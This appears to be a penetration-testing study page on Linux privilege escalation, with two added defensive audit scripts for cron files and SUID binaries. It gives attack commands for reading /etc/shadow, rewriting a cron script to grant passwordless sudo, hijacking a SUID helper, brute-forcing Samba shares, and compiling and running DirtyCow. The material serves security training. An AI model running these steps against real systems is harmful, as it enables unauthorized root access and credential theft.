Tier II

Linux

Linux is a free and open-source operating system that combines the Linux kernel and the GNU toolkit.


Linux is a free and open-source operating system that combines the Linux kernel and the GNU toolkit (a collection of utilities such as the cat and ls commands).

It is often deployed as a server, so it is common to find certain ports open on Linux systems.

There are many different Linux distributions (distros), which are variants of the operating system that use different desktops.



Useful Linux Commands


Create a bash session on the target:
shell

Create the bash session:
/bin/bash -i

Change folder (back):
cd ../folder

Change folder (forward):
cd folder

Change file permissions:
chmod u+x file

Check available shells (usually on Kali Linux):
ls -al /usr/share/webshells

Check the current user's sudo rights:
sudo -l

Check system kernel version:
uname -a

Get info about the target operating system:
sysinfo

Find running processes:
ps aux

List listening TCP/UDP sockets and the processes that own them:
netstat -tunlp

List all files and permissions:
ls -l

List users on the system:
cat /etc/passwd

Read system password shadow file (if possible):
cat /etc/shadow

Search for a file:
find / -name "filename" 2>/dev/null

Search for SUID binaries (privilege escalation):
find / -perm -4000 2>/dev/null

Show current directory:
pwd

Show current user:
whoami

Show the IP configuration of the target's network interfaces:
ifconfig

Exploit Linux



Exploit Misconfigured Cron Jobs


Linux schedules tasks using Cron. Cron is a time-based service that runs applications and commands repeatedly on a specified schedule (each scheduled task is a cronjob).

Every user can create a cronjob, but these tasks run with the privileges of the user that created them.

Example

Find every occurrence of the path:
grep -rnw /usr -e "/home/student/message"

Show the content of the file in which the path occurs:
cat occurrence-path

Overwrite the script that the target cronjob runs with our own content:
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
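
The defender-side check for the misconfiguration above, as an added example that is not part of the original page: it reads crontab files and reports every referenced file that someone other than root could modify. The function names, the TRUSTED_UID variable and the fixture built in demo are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original page. Names and fixture are assumptions.
TRUSTED_UID=${TRUSTED_UID:-0}   # only this owner (root) may modify cron-run files

# Print each absolute path named on an active line of the given crontab files.
cron_paths() {
    awk '/^[ \t]*(#|$)/ { next }
         { for (i = 1; i <= NF; i++)
               if ($i ~ /^\//) { sub(/[;|&)]+$/, "", $i); print $i } }' "$@" | sort -u
}

# Succeed when the file or its parent directory is group/world-writable or is
# owned by someone other than TRUSTED_UID. Symlinks are followed (-L).
is_tamperable() {
    [ -n "$(find -L "$1" "$(dirname "$1")" -maxdepth 0 \
            \( -perm /022 -o ! -user "$TRUSTED_UID" \) 2>/dev/null)" ]
}

# Print "RISK <path>" for every existing cron-referenced path that is tamperable.
audit_cron() {
    cron_paths "$@" | while IFS= read -r p; do
        if [ -e "$p" ] && is_tamperable "$p"; then echo "RISK $p"; fi
    done
}

# Constructed fixture: a crontab that runs a world-writable copy.sh (the
# condition described above) next to a correctly locked-down backup.sh.
demo() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/copy.sh";   chmod 777 "$d/copy.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 755 "$d/backup.sh"
    printf '# constructed sample\n*/1 * * * * root %s\n0 3 * * * root %s\n' \
        "$d/copy.sh" "$d/backup.sh" > "$d/crontab"
    # The fixture is owned by whoever runs the demo, so trust that uid here.
    ( TRUSTED_UID=$(id -u); audit_cron "$d/crontab" ) | sed "s|$d/||"
    rm -rf "$d"
}
demo   # on a real host: audit_cron /etc/crontab /etc/cron.d/*
```

Files in sticky-bit directories such as /tmp are reported too, because the parent directory is world-writable.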


Exploit Samba


Samba is the Linux version of SMB and it is used to allow file sharing with Windows systems.

Samba is not preconfigured in Linux, so it is not a service that is used often.

You can perform a brute-force attack with Hydra to gain credentials and access to user shares.


Use SmbMap to access the shares of the user we have found with Hydra:
smbmap -H target-ip -u admin -p target-password

Use Smbclient to navigate in the target share with the target credentials:
smbclient //target-ip/target-share -U admin

You can use enum4linux to get an overview of the target system:
enum4linux -a -u admin -p target-password target-ip


Exploiting SUID Binaries


In addition to the standard permissions (read, write, execute), Linux has another permission called SUID (Set Owner User ID).

SUID allows a non-privileged user to access or execute a file with elevated privileges (those of the file's owner).

List the strings inside the file with the s permission to see which files it executes:
strings file-with-s-permission

We have seen that another file (in this case greetings) is executed too;
we can remove it and replace it with another one to gain privileges:
rm file

Copy /bin/bash to that file name so that when it is executed it will give us privileges:
cp /bin/bash file

Execute this file:
./file-with-s-permission
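
A defender-side review of the condition this section relies on, as an added example that is not part of the original page: it lists set-uid files, compares them with an approved baseline and flags any that sit in a directory other users can write to, which is what lets a helper such as greetings be swapped. The function names, the baseline file format (one path per line) and the fixture built in demo_suid are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page. Names and fixture are assumptions.

# Succeed when the directory holding file $1 is group/world-writable or owned
# by someone other than the file's owner: helpers beside it can then be replaced.
loose_dir() {
    owner=$(stat -c %u "$1") || return 1
    [ -n "$(find "$(dirname "$1")" -maxdepth 0 \
            \( -perm /022 -o ! -user "$owner" \) 2>/dev/null)" ]
}

# usage: suid_review BASELINE ROOT...
# Prints "<flags> <path>" for each set-uid file that is missing from the
# approved BASELINE list (NEW) or sits in a loose directory (LOOSE-DIR).
suid_review() {
    base=$1; shift
    find "$@" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        flags=
        grep -qxF -- "$f" "$base" || flags=NEW
        if loose_dir "$f"; then flags=${flags:+$flags,}LOOSE-DIR; fi
        if [ -n "$flags" ]; then echo "$flags $f"; fi
    done
}

# Constructed fixture: one approved set-uid file, one unapproved file in a
# tight directory, and one (welcome) in a world-writable directory beside the
# helper it would run.
demo_suid() {
    d=$(mktemp -d) || return 1
    mkdir "$d/bin" "$d/home"; chmod 755 "$d/bin"; chmod 777 "$d/home"
    for f in bin/approved bin/added home/welcome; do
        : > "$d/$f"; chmod 4755 "$d/$f"
    done
    : > "$d/home/greetings"                      # helper, not set-uid
    echo "$d/bin/approved" > "$d/baseline"
    suid_review "$d/baseline" "$d" | sed "s|$d/||"
    rm -rf "$d"
}
demo_suid   # on a real host: suid_review /root/suid.baseline /
```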

Linux Kernel Exploits

Kernel exploits target Linux kernel vulnerabilities to run commands with elevated privileges, usually in order to obtain a shell.

Kernel escalation process:

  • Identify kernel vulnerabilities
  • Download, compile and transfer kernel exploits to the target system

  • You can use various tools, for example Linux-Exploit-Suggester or Dirty-Cow (both from GitHub)


    Exploit-Suggester


    Perform a Linux exploit in order to gain a Meterpreter shell on the target.
    Download linux-exploit-suggester from GitHub.
    In the Meterpreter session on the target, upload the Linux Exploit Suggester to the target:
    upload linux-exploit-suggester-path

    Execute a shell:
    shell

    Make the Linux Exploit Suggester that you have just uploaded executable:
    chmod +x les.sh

    Execute the Linux Exploit Suggester:
    ./les.sh

    This tool will give you all the possible exploits on the target, with details and probabilities.


    DirtyCow


    Download the DirtyCow tool from GitHub or exploit-db.
    In the Meterpreter shell, upload the DirtyCow tool to your target system:
    upload path-to-dirtycow

    Install a compiler for the C language:
    sudo apt-get install gcc

    Rename the file:
    mv 40839.c dirty.c

    Compile it with this command:
    gcc -pthread dirty.c -o dirty -lcrypt

    Select a password to use; this command will create a new user with that password (you can also configure the username):
    ./dirty password

    Log in with the new user (use the correct username):
    su firefart

Linux Vulnerabilities


Exploiting Bash Vulnerability: ShellShock (Apache)


This vulnerability allows the attacker to execute commands on the Linux target system; it targets Apache and Bash.

To exploit this vulnerability you can try to do it manually by writing bash commands on the CGI interface, or you can use Metasploit exploit modules.